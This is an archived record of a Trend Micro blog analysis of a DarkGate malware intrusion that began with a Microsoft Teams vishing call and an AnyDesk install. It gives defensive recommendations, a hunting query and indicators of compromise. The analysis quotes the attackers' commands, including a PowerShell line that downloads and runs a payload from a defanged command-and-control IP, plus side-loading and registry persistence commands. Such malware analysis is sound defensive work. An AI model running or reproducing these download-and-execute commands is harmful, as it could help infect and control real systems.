{
	"id": "0a769045-1a98-4d36-b1e6-26a3bca48b11",
	"created_at": "2026-04-06T01:29:31.810574Z",
	"updated_at": "2026-04-10T13:11:59.179281Z",
	"deleted_at": null,
	"sha1_hash": "3d031a9d5293dfed9ab0482c0d75c40785604cca",
	"title": "Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1512843,
	"plain_text": "Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion\r\nBy Catherine Loveria, Jovit Samaniego, Gabriel Nicoleta, Aprilyn Borja ( words)\r\nPublished: 2024-12-13 · Archived: 2026-04-06 00:43:16 UTC\r\nCyber Threats\r\nIn this blog entry, we discuss a social engineering attack that tricked the victim into installing a remote access tool,\r\ntriggering DarkGate malware activities and an attempted C\u0026C connection.\r\nBy: Catherine Loveria, Jovit Samaniego, Gabriel Nicoleta, Aprilyn Borja Dec 13, 2024 Read time: 7 min (1923 words)\r\nSave to Folio\r\nSummary\r\nThe Trend Micro Managed Detection and Response (MDR) team analyzed an incident wherein an attacker used\r\nsocial engineering via a Microsoft Teams call to impersonate a user’s client and gain remote access to their system.\r\nThe attacker failed to install a Microsoft Remote Support application but successfully instructed the victim to\r\ndownload AnyDesk, a tool commonly used for remote access.\r\nAfter gaining access to the machine, the attacker dropped multiple suspicious files. One of the suspicious files was\r\ndetected as Trojan.AutoIt.DARKGATE.D.\r\nA series of commands executed by Autoit3.exe led to the connection to a potential command-and-control server and\r\nthe subsequent download of a malicious payload.\r\nPersistent files and a registry entry were created on the victim's machine, though the attack was ultimately thwarted\r\nbefore exfiltration occurred.\r\nUsing Vision One, we observed a recent security incident in which a user was targeted by an attacker posing as an employee\r\nof a known client on a Microsoft Teams call. This led to the user being instructed to download the remote desktop\r\napplication AnyDesk, which then facilitated the deployment of DarkGate malwareopen on a new tab. DarkGate, distributed\r\nvia an AutoIt script, enabled remote control over the user's machine, executed malicious commands, gathered system\r\ninformation, and connected to a command-and-control server. In this blog entry, we discuss how this breach was carried out\r\nin several stages, emphasizing the need for robust security measures and heightened awareness against social engineering\r\nattacks. \r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 1 of 10\n\nInitial access\r\nFrom this sample case, the attacker used social engineeringopen on a new tab to manipulate the victim to gain access and\r\ncontrol over a computer system. The victim reported that she first received several thousands of emails, after which she\r\nreceived a call via Microsoft Teams from a caller claiming to be an employee of an external supplier. During the call, the\r\nvictim was instructed to download Microsoft Remote Support application, however, the installation via the Microsoft Store\r\nfailed. The attacker then instructed the victim to download AnyDesk via browser and manipulate the user to enter her\r\ncredentials to AnyDesk. Impersonating IT support to potential victims following an email flood is a technique that has been\r\npreviously disclosed in a Microsoft blog entryopen on a new tab.\r\nDuring the call, the victim was instructed to download a Microsoft Remote Support application; however, the installation via\r\nthe Microsoft Store failed. The attacker then instructed the victim to download AnyDesk from its official site via browser,\r\nand manipulated the user into entering her credentials to AnyDesk. \r\nExecution\r\nThe execution of AnyDesk.exe was observed seconds after downloading the application. The command ran is as follows:\r\n“C:\\Users\\\u003cuser\u003e\\Downloads\\AnyDesk.exe\" --local-service\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 2 of 10\n\nThis command runs the AnyDesk remote desktop application and starts it as a local service on the system, allowing it to\r\noperate with elevated privileges or in a minimized/automated fashion.\r\nA few minutes after, cmd.exe was invoked to execute rundll32.exe to load SafeStore.dll, which we assumed were dropped\r\nvia AnyDesk.exe.\r\nprocessCmd: \"C:\\Windows\\System32\\cmd.exe\"\r\neventSubId: 2 - TELEMETRY_PROCESS_CREATE\r\nobjectFilePath: c:\\windows\\system32\\rundll32.exe\r\nobjectCmd: rundll32.exe SafeStore.dll,epaas_request_clone\r\nVision One’s root cause analysis (RCA) in Figure 4 shows a DLL side-loading technique where rundll32.exe was invoked to\r\nexecute an exported function in Safestore.dll called epaas_request_clone (Figure 3). There are multiple functions exported\r\nby the DLL that can be used to execute the malware (Figure 4).\r\nThe execution of Safestore.dll, originally named epaas_client.dll, prompts a login form for entering credentials (Figure 5). \r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 3 of 10\n\nWhile the suspicious form was executing, multiple malicious commands were running in the background, even if the user\r\ndid not enter any credentials. The commands are as follow:\r\ncmd /c systeminfo – provides detailed information about the system's configuration, including the operating system\r\nversion, hardware specifications, memory, network adapter details, and system uptime.\r\ncmd /c route print – provided the current network routing table, showing how network traffic is directed to different\r\ndestinations based on the system's network configuration.\r\ncmd /c ipconfig /all – provided detailed information about all network interfaces on the system, including IP\r\naddresses, subnet masks, gateways, DNS servers, and other network configuration details.  \r\nSaving all the data gathered from the system to 123.txt may be used for system discovery (Figure 6).\r\nDarkGate A3x script\r\nThe executable file SystemCert.exe (SHA256:\r\n4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1), which we believed was dropped via\r\nAnyDesk.exe, was executed and created script.a3x and Autoit3.exe in the C:\\Temp\\test\\ folder (Figure 7).\r\nAfter the script.a3x and AutoIt3.exe files are created, the malicious script script.a3x is executed via the command cmd\r\nc:\\temp\\test\\AutoIt3.exe c:\\temp\\test\\script.a3x.\r\nThe encrypted AutoIt payload script.a3x decrypts itself in memory as shellcode and injects itself into remote processes. One\r\nobserved example was the legitimate binary for MicrosoftEdgeUpdateCore.exe, located in C:\\Program Files\r\n(x86)\\Microsoft\\EdgeUpdate. This process is used as a proxy to load and execute the DarkGate script into memory. The\r\nexecution flow then loads other types of malware into memory to carry out subsequent stages of the attack.\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 4 of 10\n\nDiscovery\r\nThen, the following discovery commands were executed by Autoit3.exe:\r\nprocessCmd: \"c:\\temp\\test\\Autoit3.exe\" c:\\temp\\test\\script.a3x\r\nobjectCmd: \"c:\\windows\\system32\\cmd.exe\" /c wmic ComputerSystem get domain \u003e\r\nC:\\ProgramData\\fcdcdfc\\kcbbbbc\r\nThis command retrieves information about the system's domain and saves the output to the file kcbbbbc inside the folder\r\nC:\\ProgramData\\fcdcdfc.\r\nDefense evasion\r\nA replicated scenario of this attack shows that Autoit3.exe is looking for multiple well-known antivirus products. \r\nIt was also observed that multiple randomly named files were created on different locations as well as copies of Autoit3.exe.\r\nThis technique is being used to evade detection.\r\nCommand and control\r\nAutoit3.exe also executed the script.a3x to inject a process into MicrosoftEdgeUpdateCore.exe, which was then observed\r\nconnecting to external IP 179.60.149[.]194:80, a C\u0026C server.\r\nprocessCmd: \"c:\\temp\\test\\Autoit3.exe\" c:\\temp\\test\\script.a3x\r\neventSubId: 2 - TELEMETRY_PROCESS_CREATE\r\nobjectFilePath: C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.35\\MicrosoftEdgeUpdateCore.exe\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 5 of 10\n\nA few minutes after the connection to IP 179.60.149[.]194, a VBScript was executed via cscript.exe:\r\nobjectCmd:cscript  spamfilter_v1.4331.vbs\r\nBased on the contents of VBScript spamfilter_v1.4331.vbs file, it will run the PowerShell command, then run the script.a3x\r\nvia Autoit3.exe.\r\nFinal DarkGate payload\r\nThe said event was accompanied by the execution of a PowerShell command that dropped the DarkGate payload:\r\nobjectCmd: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Command Invoke-Expression (Invoke-RestMethod -Uri hxxp://179.60.149[.]194:8080/fdgjsdmt)\r\nThe command above will attempt to download fdgjsdmt from hxxp://179.60.149[.]194:8080 and execute it with the\r\nfollowing content:\r\nobjectRawDataStr:ni 'C:/rbne/dxqu/' -Type Directory -Force;cd 'C:/rbne/dxqu/';Invoke-WebRequest -Uri\r\n\"hxxp://179.60.149[.]194:8080/dogjaafa\" -OutFile 'file.zip';Expand-Archive -Path 'file.zip' -DestinationPath 'C:/rbne/dxqu/';\r\nThis command will create a directory at C:\\rbne\\dxqu\\ if it doesn't already exist. The -Force flag forces the creation even if\r\nthe directory already exists or if it has hidden or system attributes. It will then attempt to download a file (dogjaafa) and\r\nsave it as file.zip.\r\nExpand-Archive is a PowerShell cmdlet used to extract the contents of a zip file. This command extracts the contents of the\r\ndownloaded file.zip into the C:\\rbne\\dxqu\\ directory. The file.zip was dropped to C:\\rbne\\dxqu\\ and contains a malicious\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 6 of 10\n\nAutoIt script.\r\nA few minutes later, an executable file, StaticSrv.exe (SHA256:\r\nfaa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b), dropped in the C:\\Users\\\u003cuser\u003e\\ folder, was\r\nexecuted and invoked AutoIt3.exe to run script.a3x. StaticSrv.exe and SystemCert.exe exhibit the same behavior.\r\nPost-installation activities\r\nMultiple files and a registry entry were then created for persistence:\r\nC:\\ProgramData\\fcdcdfc\\gdhfdfd\\18-11-2024.log (encrypted key logs)\r\nC:\\ProgramData\\fcdcdfc\\kkfafef\r\nC:\\Temp\\gggahbb\r\nC:\\Temp\\hbakdef\r\nThe following files were also created by Autoit3.exe, including a copy of itself, possibly for backup purposes:\r\nC:\\ProgramData\\fcdcdfc\\Autoit3.exe\r\nC:\\ProgramData\\fcdcdfc\\bbbckdb.a3x\r\nC:\\Temp\\cdcecgg\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\EaDeKFb\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 7 of 10\n\nThe registry entry created by MicrosoftEdgeUpdateCore.exe is as follows:\r\nRegistry root:2\r\nRegistry key:HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nRegistry value name:ddadcae\r\nRegistry value data: \"C:\\ProgramData\\fcdcdfc\\Autoit3.exe\" C:\\ProgramData\\fcdcdfc\\bbbckdb.a3x\r\nRegistry value type:1\r\nConclusion and security recommendations\r\nIn this case we have studied, the attack was prevented before the attacker achieved their objective. There are no activities\r\nrelated to exfiltration found. DarkGate is primarily distributed through phishing emails, malvertising and SEO poisoning.\r\nHowever, in this case, the attacker leveraged voice phishing (vishing)open on a new tab to lure the victim. The vishing\r\ntechnique has also been documented by Microsoftopen on a new tab, in a case where the attacker utilized QuickAssist to\r\ngain access to its target to distribute ransomware.   \r\nTo protect themselves from attacks like that discussed in this blog entry, organizations can apply the following best\r\npractices:\r\nThoroughly vet third-party technical support providers. While legitimate third-party technical support services\r\nexist, organizations should ensure that any claims of vendor affiliation are directly verified before granting remote\r\naccess to corporate systems. Cloud vetting processes should be established to evaluate and approve remote access\r\ntools, such as AnyDesk, by assessing their security compliance and the reputation of their vendors.\r\nWhitelist approved remote access tools and block any unverified applications. Organizations should integrate\r\nmulti-factor authentication (MFA) on remote access tools to add an additional layer of protection by requiring\r\nmultiple forms of verification before access is granted.  This reduces the risk of malicious tools being used to gain\r\ncontrol over internal machines.\r\nProvide employee training to raise awareness about social engineering tactics, phishing attempts, and the\r\ndangers of unsolicited support calls or pop-ups.  Well-informed employees are less likely to fall victim to social\r\nengineering attacks, strengthening the organization’s overall security posture.\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 8 of 10\n\nTo effectively combat the evolving threat landscape, organizations must prioritize a layered security approach. Solutions like\r\nTrend Micro Apex One™open on a new tab with XDR offer a complete security-as-a-service (SaaS) solution, providing full\r\naccess to the XDR capabilities in Trend Vision One™open on a new tab for detecting, responding to, and enhancing the\r\nprevention of cyberattacks. Additionally, Trend Micro™ Managed XDRopen on a new tab, included in Trend Service\r\nOne™open on a new tab, plays a crucial role by delivering round-the-clock monitoring, defense, and detection to ensure\r\ncontinuous protection against emerging threats.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights\r\nwithin Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and better\r\nprepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the\r\ntechniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments,\r\nmitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nVishing via Microsoft Teams Facilitates DarkGate Malware Intrusion\r\nSpike in DarkGate Activity - with a new version and new infrastructure\r\nA new DARKGATE campaign was observed\r\nTrend Micro Vision One Threat Insights App\r\nEmerging Threats:  Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusionopen on a new tab\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTo hunt for possible malicious activities relating to DarkGate, you may use the query below.  The threat hunting query below\r\ndetects presence of Autoit3 and script files (.a3x) which are being created and executed.  Note that this can also be triggered\r\nby normal activity.\r\neventSubId: 101 - TELEMETRY_FILE_CREATE\r\neventSubId: 2 - TELEMETRY_PROCESS_CREATE\r\neventSubId:101 andeventSubId:2 and (objectCmd:(Autoit3.exe or *.a3x) or processCmd:(Autoit3.exe or *.a3x))\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabledopen on a new tab.\r\nIndicators of Compromise (IOCs)\r\nSHA256 Indicator Detection\r\n1cbda9a3f202e7aacc57bcf3d43ec7b1ca42564a947d6b5a778df90cddef079a  SafeStore.dll  Trojan.Win64.DARKGAT\r\n4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1  SystemCert.exe  Trojan.Win32.DARKGAT\r\nfaa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b  StaticSrv.exe  Trojan.Win32.DARKGAT\r\nbb56354cdb241de0051b7bcc7e68099e19cc2f26256af66fad69e3d2bc8a8922  script.a3x  Trojan.AutoIt.DARKGAT\r\ne4d13af4bfc3effe4f515c2530b1b182e18ad0c0a3dacac4dd80d6edcf0b007a  spamfilter_v1.4331.vbs  Trojan.VBS.DARKGATE\r\nURL/IP Rating Category\r\n179.60.149.194 Dangerous C\u0026C Server\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 9 of 10\n\nhxxp://179[.]60[.]149[.]194:8080/fdgjsdmt Dangerous Malware Accomplice\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nhttps://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/l/darkgate-malware.html"
	],
	"report_names": [
		"darkgate-malware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438971,
	"ts_updated_at": 1775826719,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3d031a9d5293dfed9ab0482c0d75c40785604cca.pdf",
		"text": "https://archive.orkl.eu/3d031a9d5293dfed9ab0482c0d75c40785604cca.txt",
		"img": "https://archive.orkl.eu/3d031a9d5293dfed9ab0482c0d75c40785604cca.jpg"
	}
}